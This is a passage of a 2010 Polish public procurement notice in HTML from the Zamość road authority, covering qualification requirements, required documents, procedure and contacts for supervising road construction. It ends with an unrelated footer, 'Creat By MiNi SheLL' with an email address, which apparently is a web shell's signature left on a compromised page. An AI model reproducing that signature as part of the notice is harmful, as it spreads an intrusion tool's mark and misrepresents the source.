w budownictwie (Dz.U. z 2006r. Nr 83 poz. 578 z późn.zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a także udokumentowane doświadczenie zawodowe, 
w tym do nadzorowania/ kierowania robotami drogowymi na drogach publicznych lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wykształcenie wyższe, minimum 5 letnie doświadczenie zawodowe, oraz wykazać pełnienie funkcji inspektora nadzoru/ kierownika budowy/ kierownika robót specjalności drogowej na minimum 1 zadaniu polegającym na budowie/ przebudowie dróg publicznych o wartości robót minimum 6 mln zł;
Przez podobną inwestycję należy rozumieć wykonanie przebudowy/ budowy drogi klasy drogi co najmniej G o długości nie mniejszej niż 1 km.


Inspektorzy nadzoru robót wchodzący w skład zespołu Inspektorów Nadzoru Inwestorskiego powinni posiadać uprawnienia do nadzoru robót budowlanych 
w w/w specjalnościach: bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 Prawo Budowlane (tekst jedn.: Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dn. 28.04.2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006r. Nr 83 poz. 578 z późn.zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, udokumentowane doświadczenie zawodowe, w tym w nadzorowaniu inwestycji w danej branży, co oznacza, że powinni posiadać wykształcenie wyższe, co najmniej 5 letnie doświadczenie zawodowe, nadzorowali co najmniej 1 inwestycję w ramach swojej branży (lub inwestycję w całości) o wartości nie mniejszej niż 2 mln zł. Pełniący Nadzór Inwestorski zobowiązany jest wykazać przynajmniej po jednej osobie do objęcia nadzoru o w/w kwalifikacjach.

Inspektorzy ds. rozliczeń i ds. zamówień publicznych, wchodzący w skład zespołu Inspektorów Nadzoru Inwestorskiego powinni oni posiadać udokumentowane doświadczenie zawodowe przy obsłudze inwestycji o wartości robót nie mniejszej niż 2 mln zł w zakresie nie mniejszym niż określony w niniejszej SIWZ w odniesieniu do odpowiednich dla tych branż obowiązków, co oznacza, że powinni posiadać wykształcenie wyższe, co najmniej 2 letnie doświadczenie zawodowe, obsługiwali co najmniej 2 inwestycje w ramach swojej branży (lub w całości) o wartości nie mniejszej niż 1 mln zł.
Pełniący Nadzór Inwestorski zobowiązany jest wykazać przynajmniej po jednej osobie do objęcia nadzoru o w/w kwalifikacjach.
Zgodnie z art. 12a ustawy z dnia 7 lipca 1994r - Prawo budowlane (t.j. z 2006r. Dz. U. Nr 156, poz. 1118 z późn. zm.) samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych 
w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63 poz. 394 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Stawia się warunek znajdowania się  w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie przedmiotu zamówienia. Wykonawca wykaże posiadanie opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 900 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy (wg załącznika nr 1) - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich Wykonawców składających ofertę wspólną.
2.	dowód wniesienia wadium w/g pkt. 8 SIWZ zgodnie z art 45 pkt. 6 i 7 ustawy Pzp. Dowód wpłaty wadium można załączyć do oferty lub wnieść oddzielnie.
3.	pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania 
w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych. Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania Wykonawców 
w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich Wykonawców ubiegających się wspólnie 
o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika - w formie oryginału lub kopii poświadczonej notarialnie.
4.	pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania Wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej)- w formie oryginału lub kopii poświadczonej notarialnie.
5.	pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
6.W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a)	W przypadku Konsorcjum należy dołączyć pełnomocnictwo do reprezentowania 
w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy zgodnie z pkt. 6.3.3. ewentualnie w przypadku spółki cywilnej - umowa spółki cywilnej określająca prawo do reprezentacji. Z pełnomocnikiem tym będzie prowadzona wszelka korespondencja wiążąca dla wszystkich członków Konsorcjum.
b)	Dokumenty wymagane w pkt 6.2.1.-6.2.6 winien złożyć każdy Wykonawca
c)	Pozostałe dokumenty oraz oświadczenie z art. 22 ust. 1 i mogą być złożone wspólnie przez Wykonawców lub oddzielnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany zawartej umowy w poniższych sytuacjach:
1)	w przypadku konieczności zastąpienia osoby wyznaczonej do pełnienia funkcji wymienionych w pkt 5.5 c nową osobą; warunkiem wprowadzenia zmiany jest posiadanie przez nową osobę kwalifikacji nie niższych niż kwalifikacje osoby wymienionej w umowie, 
2)	w przypadku niezawinionego przez  pełniącego Nadzór Inwestorski przesunięcia (wydłużenia) harmonogramu czasowego i ostatecznego zakończenia robót objętych usługą, w tym także ze względu na przedłużające się postępowania przetargowe na wybór Wykonawcy robót budowlanych, wydłużeniu ulec może termin realizacji umowy,
3)	w przypadku wystąpienia innych okoliczności nie wynikających z winy pełniącego Nadzór Inwestorski ani Zamawiającego, których nie można było przewidzieć 
w chwili zawarcia umowy a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla Zamawiającego.
4)	w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.
Powyższe ewentualne zmiany zostaną wprowadzone aneksami i dokonane po przeprowadzeniu uzgodnień przez strony umowy. 
5) Wysokość wynagrodzenia może ulec zmianie w przypadku zmiany obowiązującej stawki VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamosc.um.gov.pl. oraz  www.zdg.zamosc.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można także uzyskać nieodpłatnie 
w siedzibie Zarządu Dróg Grodzkich w Zamościu, ul. Partyzantów 61, 22-400 Zamość, pokój nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2010 godzina 10:00, miejsce: Oferty należy składać w Zarządzie Dróg Grodzkich w Zamościu, 
ul. Partyzantów 61, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca usługi pełnić będzie Nadzór Inwestorski  dla inwestycji finansowanej w części ze środków własnych Zamawiającego oraz w części współfinansowanej w ramach Programu Operacyjnego Infrastruktura i Środowisko Priorytet VI : Drogowa i lotnicza sieć TEN-T. Działanie 6.1 Rozwój sieci drogowej TEN-T.
W imieniu Zamawiającego postępowanie przetargowe prowadzi:  
ZARZĄD DRÓG GRODZKICH 
w Zamościu 

Adres korespondencyjny Zamawiającego dla celów niniejszego postępowania:
ZARZĄD DRÓG GRODZKICH
w Zamościu 
ul. Partyzantów 61
22-400 Zamość
Tel. / fax (+84) 639 6189
Tel.          (+84) 638 3198 
www.zdg.zamosc.bip.info.pl
Godziny pracy:     7:00 do 15:00
Publiczne otwarcie ofert nastąpi w dniu: 03.09.2010r. o godz. 10:30 w pokoju 
nr 4, w Zarządzie Dróg Grodzkich w Zamościu, ul. Partyzantów 61. Osobą upoważnioną do kontaktowania się z Wykonawcami jest: Zdzisław Dymara - Naczelnik Sekcji Zamówień Publicznych  (tel. 84 639 61 89, 
84 638 31 98)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com